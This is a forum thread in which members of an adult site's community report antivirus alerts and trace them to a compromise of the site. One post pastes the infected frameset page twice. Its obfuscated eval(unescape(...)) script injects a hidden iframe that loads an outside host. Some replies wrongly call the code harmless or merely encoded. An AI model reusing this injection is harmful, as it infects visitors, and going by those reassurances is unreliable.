I have received a warning from a member here that his/her virus program have warned about a virus somewhere on the boundanna.com or .net sites. (Possibly also this forum.) The threat was called Trojan-Downloader.HTML.IFrame.iu.
The exact page that triggered the warning is unknown for me at this time but I have done some checking around and found nothing fishy. Warnings like this is often false alarm but should not be neglected. Please always use an up to date operating system, an up to date virus protection and a good firewall to protect yourself while connected. Also consider using an alternative web browser if you are using Explorer as it seems this browser is a favorite target.
I will continue to search for the cause of this warning but please let me know if anyone of you notices anything fishy.
Virus warning!
I agree, I keep getting warnings from my antivirus-program every time I refresh the forum index.
To be specific, the threads are JS/Psyme and JS/Downloader-Agent, located in my opera cache. Since I got the message three times in a row after refreshing this page, it seems the virus is creeping around somehwere in here.
To be specific, the threads are JS/Psyme and JS/Downloader-Agent, located in my opera cache. Since I got the message three times in a row after refreshing this page, it seems the virus is creeping around somehwere in here.
There is a beast inside man that should be exercised, not exorcised.
I've gotten the warning when I log in (automatically) to the forum. First time I wasn't sure it was coming from here though, but when it happened again at log in, I was pretty sure. I was about to send a note about it when I saw this thread.
There's a fine line between cuddling and holding someone down so they can't get away.
The beatings will continue until morale improves.
Do not meddle in the affairs of dragons - for you are crunchy and good with ketchup.
The beatings will continue until morale improves.
Do not meddle in the affairs of dragons - for you are crunchy and good with ketchup.
-
bound_jenny
- Moderator
- Posts: 10268
- Joined: 09 Dec 2007, 12:37
- Location: Montreal, Canada, Great Kinky North
I got a warning about a blocked address from my anti-threat package every time I go to or refresh the main forum page.
The address is search-you-need.com/fram.js and the IP is 58.65.239.126:80.
A quick search on my favorite search engine brings up "Nuded Britney Spears" that is 100% checked by antivirus (yeah, right) and an untitled download link. Sounds like a malware site to me.
So far I don't seem to get it from any of the subforums or threads. I'll keep an eye out for anything else suspicious.
Jenny.
The address is search-you-need.com/fram.js and the IP is 58.65.239.126:80.
A quick search on my favorite search engine brings up "Nuded Britney Spears" that is 100% checked by antivirus (yeah, right) and an untitled download link. Sounds like a malware site to me.
So far I don't seem to get it from any of the subforums or threads. I'll keep an eye out for anything else suspicious.
Jenny.
Helplessness is a doorway to the innermost reaches of the soul.
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
-
teh-ah-tim-eh
- **
- Posts: 183
- Joined: 30 Jul 2008, 03:49
- Location: Hull, England
The hacking.
Thank you all for the help locating this issue. It have been fixed now and I sincerely hope that no one have been infected by anything because of this.
Anna
Anna
IFrames in general are embedded frames within html code. The internet explorer is well known for bugs with handling them, allowing the execution of program code from a remote site.
So, if (on any page) your antivirus pops a warning about that, better block that link.
And it doesn't need to have something to do with the actual site...it can be a commercial banner, the hosters page or zillions of other locations.
Cheers
FF
So, if (on any page) your antivirus pops a warning about that, better block that link.
And it doesn't need to have something to do with the actual site...it can be a commercial banner, the hosters page or zillions of other locations.
Cheers
FF
"Do you suffer from perverted fantasies?"
"Suffer? I whoefully enjoy them!"
"Suffer? I whoefully enjoy them!"
www.boundanna.net is blocked by my scanner with saying
VBS:Malware-gen
VBS:Malware-gen
-
bound_jenny
- Moderator
- Posts: 10268
- Joined: 09 Dec 2007, 12:37
- Location: Montreal, Canada, Great Kinky North
virus warning
I've asked a friend who does ICT thingies to look at it since I'm always really scared about virus 
He said there is a suspicious encrypted iframe in http://www.boundanna.net/html/frameset.html and then he did a scan on that file with 36 different scanners, 13 reported a virus alert on it.
He said there is a suspicious encrypted iframe in http://www.boundanna.net/html/frameset.html and then he did a scan on that file with 36 different scanners, 13 reported a virus alert on it.
-
bound_jenny
- Moderator
- Posts: 10268
- Joined: 09 Dec 2007, 12:37
- Location: Montreal, Canada, Great Kinky North
I just took a look at the source of both frames of the main page and they're both only plain HTML - totally harmless.
If only 13 of the 36 reported virus, it could be a false alarm, unless it's another page you haven't yet specified (like one of the pages accessible from the left-hand frame).
Jenny.
Forum Moderator.
If only 13 of the 36 reported virus, it could be a false alarm, unless it's another page you haven't yet specified (like one of the pages accessible from the left-hand frame).
Jenny.
Forum Moderator.
Helplessness is a doorway to the innermost reaches of the soul.
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
If my corset isn't tight, it just isn't right!
Kink is the spice of life!
Come to the Dark Side - we have cookies!
The block with the % things in it? It isn't just text
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="Adobe PageMill 3.0 Win">
<TITLE>boundanna.com</TITLE>
<LINK REL="shortcut icon" HREF="../favicon.ico">
<LINK REL="meta" HREF="http://www.boundanna.com/labels.rdf" TYPE="application/rdf+xml" TITLE="ICRA labels" /><!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->
</HEAD>
<FRAMESET FRAMEBORDER=1 COLS="150,38%">
<FRAME SRC="en_navigation.html" NAME="navigation" NORESIZE>
<FRAME SRC="en_main.html" NAME="contents" NORESIZE>
<NOFRAMES>
<BODY>
Viewing this page requires a browser capable of displaying frames.
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="Adobe PageMill 3.0 Win">
<TITLE>boundanna.com</TITLE>
<LINK REL="shortcut icon" HREF="../favicon.ico">
<LINK REL="meta" HREF="http://www.boundanna.com/labels.rdf" TYPE="application/rdf+xml" TITLE="ICRA labels" /><!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->
</HEAD>
<FRAMESET FRAMEBORDER=1 COLS="150,38%">
<FRAME SRC="en_navigation.html" NAME="navigation" NORESIZE>
<FRAME SRC="en_main.html" NAME="contents" NORESIZE>
<NOFRAMES>
<BODY>
Viewing this page requires a browser capable of displaying frames.
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
Re: virus warning
aaah, i see. you are referring to the mainsite, not the board.Ilse wrote:I've asked a friend who does ICT thingies to look at it since I'm always really scared about virus
He said there is a suspicious encrypted iframe in http://www.boundanna.net/html/frameset.html and then he did a scan on that file with 36 different scanners, 13 reported a virus alert on it.
if you are afraid of that iframe, use this direct link to the board itself in the future, instead off coming in over the main page:
http://forum.boundanna.net/forum/index.php
btw: this doesn't look encrypted to me, but more like ASCII for glyphs.
meaning %40% stands for "@" for example
hope that helps.
a reason for the virusalerts could be that the heuristic could have been set
to the highest level. in this setting most AV's are very sensitive to "botched" code.
-
bound_jenny
- Moderator
- Posts: 10268
- Joined: 09 Dec 2007, 12:37
- Location: Montreal, Canada, Great Kinky North
